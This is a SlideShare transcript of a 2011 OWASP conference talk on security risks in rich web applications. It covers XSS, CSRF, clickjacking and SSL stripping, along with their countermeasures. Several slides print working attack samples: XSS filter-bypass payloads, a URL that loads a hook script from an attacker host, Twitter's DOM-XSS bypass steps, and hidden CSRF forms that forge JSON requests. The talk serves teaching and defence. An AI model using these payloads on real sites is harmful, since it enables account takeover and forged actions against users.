Application Security                                    for RIAs                               John Wilander,   & OWASPWed...
Frontend developer at                              Svenska Handelsbanken                              Researcher in applic...
ÅåÄäÖöWednesday, November 2, 2011
OWASP Top 10                               Top web application                                security risks 2010Wednesday...
1. Injection                   2. Cross-Site Scripting (XSS)                   3. Broken Authentication and Session       ...
”Do I have to care?”Wednesday, November 2, 2011
Likelihood of ≥ 1 vulnerability on your site      From: WhiteHat Website Security Statistic Report, Winter 2011Wednesday, ...
Per extension                                               .asp .aspx .do .jsp .php                       Sites having ha...
But we’re moving                                towards more                               code client-sideWednesday, Nove...
Client-Side, JavaScript                           Vulnerabilities             From: IBM X-Force 2011 Mid-Year Trend and Ri...
Client-Side, JavaScript                           Vulnerabilities             From: IBM X-Force 2011 Mid-Year Trend and Ri...
Focus Today                   • Cross-Site Scripting (XSS)                   • Cross-Site Request Forgery (CSRF)          ...
XSS ...                              the hack that keeps on hackingWednesday, November 2, 2011
Cross-Site Scripting                                      Theory                                         Scripting        ...
Cross-Site Scripting                                         Type 1, reflected                                             ...
Cross-Site Scripting                                    Type 2, stored                                                    ...
Cross-Site Scripting                                    Type 2, stored                                        ScriptingWed...
Cross-Site Scripting                                                           Type 0, DOM-based                          ...
Cross-Site Scripting                                                           Type 0, DOM-based                          ...
https://secure.bank.com/         authentication#language=sv&country=SEWednesday, November 2, 2011
https://secure.bank.com/         authentication#language=sv&country=SE                               Never sent to server ...
Would you click this?    https://secure.bank.com/authentication  #language=<script src="http://attackr.se:      3000/hook....
Would you click this?    https://secure.bank.com/authentication  #language=%3Cscript%20src%3D%22http%3A%2F   %2Fattackr.se...
Would you click this?                              http://bit.ly/Yg4T32Wednesday, November 2, 2011
Filter out <script>?     var ... ,      stripScriptsRe = /(?:<script.*?>)((n|r|.)*?)(?:</script>)/ig,     /**      * Strip...
Filter out <script>?   <img src=1 onerror=alert(1)>   <svg onload="javascript:alert(1)"   xmlns="http://www.w3.org/2000/sv...
”C’mon, such attacks                         don’t really work,                            do they?”                      ...
DOM-Based XSS                               Twitter September 2010             Full story at             http://blog.minde...
(function(g){        var a = location.href.split("#!")[1];        if(a) {          g.location = a;        }       })(windo...
(function(g){                   What does this code do?        var a = location.href.split("#!")[1];        if(a) {       ...
”https://twitter.com/#!/                         johnwilander”.split(”#!”)[1]                         returns             ...
”https://twitter.com/#!/                         johnwilander”.split(”#!”)[1]                         returns             ...
”https://twitter.com/#!/                         johnwilander”.split(”#!”)[1]                         returns             ...
http://twitter.com/           #!javascript:alert(document.domain);Wednesday, November 2, 2011
http://twitter.com/           #!javascript:alert(document.domain);                              Never sent to server      ...
The Patch™       var c = location.href.split("#!")[1];       if (c) {         window.location = c.replace(":", "");       ...
The Patch™       var c = location.href.split("#!")[1];       if (c) {         window.location = c.replace(":", "");       ...
http://twitter.com/         #!javascript::alert(document.domain);Wednesday, November 2, 2011
http://twitter.com/         #!javascript::alert(document.domain);Wednesday, November 2, 2011
The 2nd Patch™       (function(g){        var a = location.href.split("#!")[1];        if(a) {          g.location = a.rep...
(function(g){        var a = location.href.split("#!")[1];        if(a) {          g.location = a.replace(/:/gi,"");      ...
(function(g){        var a = location.href.split("#!")[1];        if(a) {          g.location = a.replace(/:/gi,"");      ...
(function(g){        var a = location.href.split("#!")[1];        if(a) {          g.location = a.replace(/:/gi,"");      ...
Were they done now?Wednesday, November 2, 2011
http://twitter.com                              #!javascript&x58;alert(1)Wednesday, November 2, 2011
http://twitter.com                              #!javascript&x58;alert(1)                                   HTML entity ve...
The n:th Patch™                                                (this one works)       (function(g){        var a = locatio...
Fix these issues properly with ...                         Client-Side EncodingWednesday, November 2, 2011
https://github.com/chrisisbeef/jquery-encoder    • $.encoder.canonicalize()          Throws Error for double encoding or m...
https://github.com/chrisisbeef/jquery-encoder    • $.encoder.canonicalize()          Throws Error for double encoding or m...
Let’s do a short demo                             of thatWednesday, November 2, 2011
Also, check out ...                 Content Security Policy                   http://people.mozilla.com/~bsterne/         ...
New HTTP Response                        Header Saying ...   Only allow scripts from whitelisted domains   and   only allo...
self = same URL, protocol and port X-Content-Security-Policy: default-src self Accept all content including scripts only f...
CSRF                              my current favorite!Wednesday, November 2, 2011
Cross-Site Request                                   Forgery                                        Request For           ...
Cross-Site Request                                   Forgery                                            Request Forgery   ...
Is www.attackr.se allowed to                                    load images like this:               <img src=”https://sec...
Is www.attackr.se allowed to                                    load images like this:     <img src=”https://secure.bank.c...
With image tags www.attackr.se can silently       send HTTP GET requests to any domain         <img src=”https://secure.ba...
”Will restricting to                   HTTP POST save me?”Wednesday, November 2, 2011
What’s on your mind?          What’s on your mind?                                    POST                          POSTWe...
What’s on your mind?          What’s on your mind?             I love OWASP!          POST                          POSTWe...
What’s on your mind?          What’s on your mind?             I love OWASP!          POST                          POST  ...
What’s on your mind?          What’s on your mind?                                    POST                          POSTWe...
What’s on your mind?          What’s on your mind?                                    POST   I hate OWASP!          POSTWe...
What’s on your mind?          What’s on your mind?                                    POST   I hate OWASP!          POSTWe...
What’s on your mind?          What’s on your mind?                                    POST   I hate OWASP!          POST  ...
What’s on your mind?             What’s on your mind?                                    POST   <form id="target" method="...
<form id="target" method="POST"                        action="https://1-liner.org/form">                         <input t...
There used to be a                       protection in web 1.5Wednesday, November 2, 2011
Forced Browsing                                     wizard-style              Shipment info ✉                       Paymen...
Forced Browsing                                     wizard-style              Shipment info ✉                       Paymen...
Forced Browsing                                    wizard-style                          Token 1   Token 2        Token 3W...
Forced Browsing                                    wizard-style                          Token 1    Token 2          Token...
Forced Browsing                                    wizard-style                          Token 1   Token 2            Toke...
But in RIAs ...Wednesday, November 2, 2011
RIA & client-side state                              {                              ”purchase”: {}                        ...
RIA & client-side state                              {                              ”purchase”: {                         ...
RIA & client-side state                              {                              ”purchase”: {                         ...
RIA & client-side state                              {                              ”purchase”: {                         ...
RIA & client-side state                              {                              ”purchase”: {                         ...
RIA & client-side state                              {                              ”purchase”: {                         ...
Can an attacker forge                  such a JSON structure?Wednesday, November 2, 2011
CSRF possible?                                  {                                  ”purchase”: {                          ...
<form id="target" method="POST" action="https://vulnerable.1-liner.org:         8444/ws/oneliners">   <input type="text"  ...
<form id="target" method="POST" action="https://vulnerable.1-liner.org:         8444/ws/oneliners" style="visibility:hidde...
<form id="target" method="POST" action="https://vulnerable.1-liner.org:         8444/ws/oneliners" style="visibility:hidde...
<form id="target" method="POST" action="https://vulnerable.1-liner.org:          8444/ws/oneliners" style="visibility:hidd...
<form id="target" method="POST" action="https://vulnerable.1-liner.org:         8444/ws/oneliners" style="visibility:hidde...
<form id="target" method="POST" action="https://vulnerable.1-liner.org:         8444/ws/oneliners" style="visibility:hidde...
Demo POST CSRF                         against REST serviceWednesday, November 2, 2011
Demo XSS + CSRF with                              The Browser Exploitation Framework                                    ht...
Important in your                                 REST API                   •      Restrict HTTP method, e.g. POST       ...
Attacker may spoof                  headers via Flash proxy                              http://lists.webappsec.org/piperm...
Double SubmitWednesday, November 2, 2011
Double Submit                               (CSRF protection)                                  Anti-CSRF value            ...
Double Submit                               (CSRF protection)                                                   cookie ≠  ...
Double Submit                               (CSRF protection)             Anti-CSRF cookie can             be generated cl...
How To Get It Right                   •      Join your local OWASP chapter                          https://www.owasp.org/...
@johnwilander                                   john.wilander@owasp.org                              http://appsandsecurit...
Clickjacking and MItM                         if there’s timeWednesday, November 2, 2011
Clickjacking DemoWednesday, November 2, 2011
X-Frame-Options                   http://blogs.msdn.com/b/ie/archive/                    2009/01/27/ie8-security-part-vii-...
No page can load me in an iframe                    or                    only my own domain can load me in an iframeWedne...
X-Frame-Options: DENY               X-Frame-Options: SAMEORIGIN               (Coming:               X-Frame-Options: ALLO...
MItM DemoWednesday, November 2, 2011
Moxie’s SSL Strip                                  http                https                               Terminates SSL ...
Moxie’s SSL Strip                                 http     https    Secure cookie?    Encoding, gzip?    Cached content?  ...
Moxie’s SSL Strip                                 http                  https    Secure cookie?               Strip secure...
SSL Strip & Tor                                                               login.yahoo.com    114                      ...
HTTP Strict Transport                          Security                    http://tools.ietf.org/html/draft-              ...
Require SSL without warnings for X seconds ahead          and          potentially do the same for my subdomains tooWednes...
Strict-Transport-Security: max-age=86400 Strict-Transport-Security: max-age=86400; includeSubdomainsWednesday, November 2,...
W3C Web Application Security Working Group                     http://www.w3.org/2011/webappsec/Wednesday, November 2, 2011
Upcoming SlideShare
Loading in...5
×

Application Security for RIAs

13,033

Published on

In this session, you’ll learn about the top 10 security risks in web applications, and, with demos, how REST backends and rich JavaScript applications map to these risks. Current and upcoming countermeasures include new HTTP headers, double submit cookies, and escaping input client-side to avoid DOM-based XSS. We’ll look at each of these, discuss the techniques you’ll want to add to your developer toolbox, and how to build reasonable security processes into an agile team environment.

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
13,033
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
94
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Transcript of "Application Security for RIAs"

  1. 1. Application Security for RIAs John Wilander, & OWASPWednesday, November 2, 2011
  2. 2. Frontend developer at Svenska Handelsbanken Researcher in application security Co-leader OWASP Sweden @johnwilander johnwilander.com (music) OWASP == The Open Web Application Security Project Cheat sheets, tools, code, guidelines https://owasp.orgWednesday, November 2, 2011
  3. 3. ÅåÄäÖöWednesday, November 2, 2011
  4. 4. OWASP Top 10 Top web application security risks 2010Wednesday, November 2, 2011
  5. 5. 1. Injection 2. Cross-Site Scripting (XSS) 3. Broken Authentication and Session Management 4. Insecure Direct Object References 5. Cross-Site Request Forgery (CSRF) 6. Security Misconfiguration 7. Insecure Cryptographic Storage 8. Failure to Restrict URL Access 9. Insufficient Transport Layer Protection 10. Unvalidated Redirects and ForwardsWednesday, November 2, 2011
  6. 6. ”Do I have to care?”Wednesday, November 2, 2011
  7. 7. Likelihood of ≥ 1 vulnerability on your site From: WhiteHat Website Security Statistic Report, Winter 2011Wednesday, November 2, 2011
  8. 8. Per extension .asp .aspx .do .jsp .php Sites having had ≥ 1 74 % 73 % 77 % 80 % 80 % serious vulnerability Sites currently having ≥ 1 57 % 58 % 56 % 59 % 63 % serious vulnerability From: WhiteHat Website Security Statistic Report, Spring 2010Wednesday, November 2, 2011
  9. 9. But we’re moving towards more code client-sideWednesday, November 2, 2011
  10. 10. Client-Side, JavaScript Vulnerabilities From: IBM X-Force 2011 Mid-Year Trend and Risk ReportWednesday, November 2, 2011
  11. 11. Client-Side, JavaScript Vulnerabilities From: IBM X-Force 2011 Mid-Year Trend and Risk ReportWednesday, November 2, 2011
  12. 12. Focus Today • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF) • Clickjacking • Man-In-the-Middle SSLWednesday, November 2, 2011
  13. 13. XSS ... the hack that keeps on hackingWednesday, November 2, 2011
  14. 14. Cross-Site Scripting Theory Scripting ite ross-S CWednesday, November 2, 2011
  15. 15. Cross-Site Scripting Type 1, reflected Scripting Cross-Site Ph isin gWednesday, November 2, 2011
  16. 16. Cross-Site Scripting Type 2, stored s-Si te C rosWednesday, November 2, 2011
  17. 17. Cross-Site Scripting Type 2, stored ScriptingWednesday, November 2, 2011
  18. 18. Cross-Site Scripting Type 0, DOM-based ng i pti Scr Cros s-Sit e Ph isin gWednesday, November 2, 2011
  19. 19. Cross-Site Scripting Type 0, DOM-based ng i pti Scr Cros No server roundtrip! s-Sit e Also, single-page interfaces make injected scripts ”stick” Ph isi in thenDOM. gWednesday, November 2, 2011
  20. 20. https://secure.bank.com/ authentication#language=sv&country=SEWednesday, November 2, 2011
  21. 21. https://secure.bank.com/ authentication#language=sv&country=SE Never sent to server Be careful when you use this data on your pageWednesday, November 2, 2011
  22. 22. Would you click this? https://secure.bank.com/authentication #language=<script src="http://attackr.se: 3000/hook.js"></script>&country=SEWednesday, November 2, 2011
  23. 23. Would you click this? https://secure.bank.com/authentication #language=%3Cscript%20src%3D%22http%3A%2F %2Fattackr.se%3A3000%2Fhook.js%22%3E%3C %2Fscript%3E&country=SEWednesday, November 2, 2011
  24. 24. Would you click this? http://bit.ly/Yg4T32Wednesday, November 2, 2011
  25. 25. Filter out <script>? var ... , stripScriptsRe = /(?:<script.*?>)((n|r|.)*?)(?:</script>)/ig, /** * Strips all script tags * @param {Object} value The text from which to strip script tags * @return {String} The stripped text */ stripScripts : function(v) { return !v ? v : String(v).replace(stripScriptsRe, ""); }, http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScriptsWednesday, November 2, 2011
  26. 26. Filter out <script>? <img src=1 onerror=alert(1)> <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg> <body onload=alert(XSS)> <table background="javascript:alert(XSS)"> ¼script¾alert(¢XSS¢)¼/script¾ <video poster=javascript:alert(1)//Wednesday, November 2, 2011
  27. 27. ”C’mon, such attacks don’t really work, do they?” Yep, demo.Wednesday, November 2, 2011
  28. 28. DOM-Based XSS Twitter September 2010 Full story at http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.htmlWednesday, November 2, 2011
  29. 29. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; } })(window);Wednesday, November 2, 2011
  30. 30. (function(g){ What does this code do? var a = location.href.split("#!")[1]; if(a) { g.location = a; } })(window);Wednesday, November 2, 2011
  31. 31. ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returns ”/johnwilander” (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; } })(window);Wednesday, November 2, 2011
  32. 32. ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returns ”/johnwilander” (function(g){ window.location = var a = location.href.split("#!")[1]; ”/johnwilander” if(a) { ’/’ => keeps the domain but initial g.location = a; changes the path } })(window);Wednesday, November 2, 2011
  33. 33. ”https://twitter.com/#!/ johnwilander”.split(”#!”)[1] returns ”/johnwilander” (function(g){ window.location = var a = location.href.split("#!")[1]; ”/johnwilander” if(a) { ’/’ => keeps the domain but initial g.location = a; changes the path } So })(window); twitter.com/#!/johnwilander becomes twitter.com/johnwilander Read more: http://kotowicz.net/absolute/Wednesday, November 2, 2011
  34. 34. http://twitter.com/ #!javascript:alert(document.domain);Wednesday, November 2, 2011
  35. 35. http://twitter.com/ #!javascript:alert(document.domain); Never sent to server => DOM-based XSSWednesday, November 2, 2011
  36. 36. The Patch™ var c = location.href.split("#!")[1]; if (c) { window.location = c.replace(":", ""); } else { return true; }Wednesday, November 2, 2011
  37. 37. The Patch™ var c = location.href.split("#!")[1]; if (c) { window.location = c.replace(":", ""); } else { return true; } Replaces the first occurance of the search stringWednesday, November 2, 2011
  38. 38. http://twitter.com/ #!javascript::alert(document.domain);Wednesday, November 2, 2011
  39. 39. http://twitter.com/ #!javascript::alert(document.domain);Wednesday, November 2, 2011
  40. 40. The 2nd Patch™ (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); } })(window);Wednesday, November 2, 2011
  41. 41. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); } })(window); Regexp pattern delimitersWednesday, November 2, 2011
  42. 42. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); } })(window); Regexp pattern delimiters Global matchWednesday, November 2, 2011
  43. 43. (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); } })(window); Regexp pattern delimiters Global match Ignore caseWednesday, November 2, 2011
  44. 44. Were they done now?Wednesday, November 2, 2011
  45. 45. http://twitter.com #!javascript&x58;alert(1)Wednesday, November 2, 2011
  46. 46. http://twitter.com #!javascript&x58;alert(1) HTML entity version of ’:’Wednesday, November 2, 2011
  47. 47. The n:th Patch™ (this one works) (function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; } })(window); And hey, Twitter is doing the right thing: https://twitter.com/about/securityWednesday, November 2, 2011
  48. 48. Fix these issues properly with ... Client-Side EncodingWednesday, November 2, 2011
  49. 49. https://github.com/chrisisbeef/jquery-encoder • $.encoder.canonicalize() Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b> • $.encoder.encodeForCSS() Encodes for safe usage in style attribute and style() • $.encoder.encodeForHTML() Encodes for safe usage in innerHTML and html() • $.encoder.encodeForHTMLAttribute() Encodes for safe usage in HTML attributes • $.encoder.encodeForJavaScript() Encodes for safe usage in event handlers etc • $.encoder.encodeForURL() Encodes for safe usage in href etcWednesday, November 2, 2011
  50. 50. https://github.com/chrisisbeef/jquery-encoder • $.encoder.canonicalize() Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b> • $.encoder.encodeForCSS() Encodes for safe usage in style attribute and style() • $.encoder.encodeForHTML() Encodes for safe usage in innerHTML and html() • $.encoder.encodeForHTMLAttribute() Encodes for safe usage in HTML attributes • $.encoder.encodeForJavaScript() Encodes for safe usage in event handlers etc • $.encoder.encodeForURL() Encodes for safe usage in href etcWednesday, November 2, 2011
  51. 51. Let’s do a short demo of thatWednesday, November 2, 2011
  52. 52. Also, check out ... Content Security Policy http://people.mozilla.com/~bsterne/ content-security-policy/Wednesday, November 2, 2011
  53. 53. New HTTP Response Header Saying ... Only allow scripts from whitelisted domains and only allow scripts from files, i.e. no inline scriptsWednesday, November 2, 2011
  54. 54. self = same URL, protocol and port X-Content-Security-Policy: default-src self Accept all content including scripts only from my own URL+port X-Content-Security-Policy: default-src *; script-src trustedscripts.foo.com Accept media only from my URL+port (images, stylesheets, fonts, ...) and scripts only from trustedscripts.foo.comWednesday, November 2, 2011
  55. 55. CSRF my current favorite!Wednesday, November 2, 2011
  56. 56. Cross-Site Request Forgery Request For gery Cro ss-S iteWednesday, November 2, 2011
  57. 57. Cross-Site Request Forgery Request Forgery Cros s-Site Ph isin gWednesday, November 2, 2011
  58. 58. Is www.attackr.se allowed to load images like this: <img src=”https://secure.bank.com/ logo.png" /> ?Wednesday, November 2, 2011
  59. 59. Is www.attackr.se allowed to load images like this: <img src=”https://secure.bank.com/ authentication#language=sv&country=SE" /> ?Wednesday, November 2, 2011
  60. 60. With image tags www.attackr.se can silently send HTTP GET requests to any domain <img src=”https://secure.bank.com/ authentication#language=sv&country=SE" height=0 width=0 />Wednesday, November 2, 2011
  61. 61. ”Will restricting to HTTP POST save me?”Wednesday, November 2, 2011
  62. 62. What’s on your mind? What’s on your mind? POST POSTWednesday, November 2, 2011
  63. 63. What’s on your mind? What’s on your mind? I love OWASP! POST POSTWednesday, November 2, 2011
  64. 64. What’s on your mind? What’s on your mind? I love OWASP! POST POST John: I love OWASP!Wednesday, November 2, 2011
  65. 65. What’s on your mind? What’s on your mind? POST POSTWednesday, November 2, 2011
  66. 66. What’s on your mind? What’s on your mind? POST I hate OWASP! POSTWednesday, November 2, 2011
  67. 67. What’s on your mind? What’s on your mind? POST I hate OWASP! POSTWednesday, November 2, 2011
  68. 68. What’s on your mind? What’s on your mind? POST I hate OWASP! POST John: I hate OWASP!Wednesday, November 2, 2011
  69. 69. What’s on your mind? What’s on your mind? POST <form id="target" method="POST" action="https://1-liner.org/form"> John: I hate OWASP! <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/> </form> <script type="text/javascript"> $(document).ready(function() { $(#form).submit(); }); </script>Wednesday, November 2, 2011
  70. 70. <form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" What’s on your mind? What’s on your mind? value="POST"/> POST </form> John: I hate OWASP! <script> $(document).ready(function() { $(#target).submit(); }); </script>Wednesday, November 2, 2011
  71. 71. There used to be a protection in web 1.5Wednesday, November 2, 2011
  72. 72. Forced Browsing wizard-style Shipment info ✉ Payment info $ Next Buy!Wednesday, November 2, 2011
  73. 73. Forced Browsing wizard-style Shipment info ✉ Payment info $ Token Next Buy!Wednesday, November 2, 2011
  74. 74. Forced Browsing wizard-style Token 1 Token 2 Token 3Wednesday, November 2, 2011
  75. 75. Forced Browsing wizard-style Token 1 Token 2 Token 3 State built up i steps, server roundtrip in-betweenWednesday, November 2, 2011
  76. 76. Forced Browsing wizard-style Token 1 Token 2 Token 3 ge for n’t to uld est Co qu re t step las out a w tith oken va lidWednesday, November 2, 2011
  77. 77. But in RIAs ...Wednesday, November 2, 2011
  78. 78. RIA & client-side state { ”purchase”: {} }Wednesday, November 2, 2011
  79. 79. RIA & client-side state { ”purchase”: { ”items”: [{}] } }Wednesday, November 2, 2011
  80. 80. RIA & client-side state { ”purchase”: { ”items”: [{},{}] } }Wednesday, November 2, 2011
  81. 81. RIA & client-side state { ”purchase”: { ”items”: [{},{}], ”shipment”: {} } }Wednesday, November 2, 2011
  82. 82. RIA & client-side state { ”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} } }Wednesday, November 2, 2011
  83. 83. RIA & client-side state { ”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} } }Wednesday, November 2, 2011
  84. 84. Can an attacker forge such a JSON structure?Wednesday, November 2, 2011
  85. 85. CSRF possible? { ”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} } }Wednesday, November 2, 2011
  86. 86. <form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners"> <input type="text" name=”” value="" /> <input type="submit" value="Go" /></form>Wednesday, November 2, 2011
  87. 87. <form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden"> <input type="text" name=”” value="" /> <input type="submit" value="Go" /></form>Wednesday, November 2, 2011
  88. 88. <form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name=”” value="" /> <input type="submit" value="Go" /></form>Wednesday, November 2, 2011
  89. 89. <form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> Forms produce a request body that <input type="text" like this: looks name=”” value="" /> theName=theValue ... and that’s not valid JSON. <input type="submit" value="Go" /></form>Wednesday, November 2, 2011
  90. 90. <form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain"> <input type="text" name={"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}// value="dummy" /> <input type="submit" value="Go" /></form>Wednesday, November 2, 2011
  91. 91. <form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" Produces a request body that looks enctype="text/plain"> like this: <input type="text" {"id": 0, "nickName": name={"id": 0, "nickName": "John", "John","oneLiner": "I "oneLiner": "I hate OWASP!", hate OWASP!","timestamp": "timestamp": "20111006"}// "20111006"}//=dummy value="dummy" /> ... and that is acceptable JSON! <input type="submit" value="Go" /></form>Wednesday, November 2, 2011
  92. 92. Demo POST CSRF against REST serviceWednesday, November 2, 2011
  93. 93. Demo XSS + CSRF with The Browser Exploitation Framework http://beefproject.com/Wednesday, November 2, 2011
  94. 94. Important in your REST API • Restrict HTTP method, e.g. POST Easier to do CSRF with GET • Restrict to AJAX if applicable X-Requested-With:XMLHttpRequest Cross-domain AJAX prohibited by default • Restrict media type(s), e.g. application/json HTML forms only allow URL encoded, multi-part and text/plainWednesday, November 2, 2011
  95. 95. Attacker may spoof headers via Flash proxy http://lists.webappsec.org/pipermail/ websecurity_lists.webappsec.org/2011- February/007533.htmlWednesday, November 2, 2011
  96. 96. Double SubmitWednesday, November 2, 2011
  97. 97. Double Submit (CSRF protection) Anti-CSRF value as cookie ... ... and request parameterWednesday, November 2, 2011
  98. 98. Double Submit (CSRF protection) cookie ≠ request parameter Cannot read the anti-CSRF cookie to include it as parameterWednesday, November 2, 2011
  99. 99. Double Submit (CSRF protection) Anti-CSRF cookie can be generated client-side => no server-side stateWednesday, November 2, 2011
  100. 100. How To Get It Right • Join your local OWASP chapter https://www.owasp.org/index.php/OWASP_Chapter • Start following these fellas on Twitter: @WisecWisec @0x6D6172696F @garethheyes @internot_ @securityninja @jeremiahg @kkotowicz @webtonull @manicode @_mwc • Start hacking – it’s fun! Best place to start? Your own apps of course. Just stay legal ;)Wednesday, November 2, 2011
  101. 101. @johnwilander john.wilander@owasp.org http://appsandsecurity.blogspot.comWednesday, November 2, 2011
  102. 102. Clickjacking and MItM if there’s timeWednesday, November 2, 2011
  103. 103. Clickjacking DemoWednesday, November 2, 2011
  104. 104. X-Frame-Options http://blogs.msdn.com/b/ie/archive/ 2009/01/27/ie8-security-part-vii- clickjacking-defenses.aspx http://tools.ietf.org/html/draft- gondrom-frame-options-01Wednesday, November 2, 2011
  105. 105. No page can load me in an iframe or only my own domain can load me in an iframeWednesday, November 2, 2011
  106. 106. X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN (Coming: X-Frame-Options: ALLOW-FROM [list])Wednesday, November 2, 2011
  107. 107. MItM DemoWednesday, November 2, 2011
  108. 108. Moxie’s SSL Strip http https Terminates SSL Normal https to the server Changes https to http Acts as clientWednesday, November 2, 2011
  109. 109. Moxie’s SSL Strip http https Secure cookie? Encoding, gzip? Cached content? Ongoing sessions?Wednesday, November 2, 2011
  110. 110. Moxie’s SSL Strip http https Secure cookie? Strip secure attribute off all cookies Encoding, gzip? Strip off all request encodings Cached content? Strip off all if-modified-since in request Ongoing sessions? 302 back to same page, set-cookie expiredWednesday, November 2, 2011
  111. 111. SSL Strip & Tor login.yahoo.com 114 Gmail 50 Tor node Hotmail 13 PayPal 9 Tor node In 24 h Tor exit node with SSL Stripe Wednesday, November 2, 2011
  112. 112. HTTP Strict Transport Security http://tools.ietf.org/html/draft- ietf-websec-strict-transport-sec-02Wednesday, November 2, 2011
  113. 113. Require SSL without warnings for X seconds ahead and potentially do the same for my subdomains tooWednesday, November 2, 2011
  114. 114. Strict-Transport-Security: max-age=86400 Strict-Transport-Security: max-age=86400; includeSubdomainsWednesday, November 2, 2011
  115. 115. W3C Web Application Security Working Group http://www.w3.org/2011/webappsec/Wednesday, November 2, 2011
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×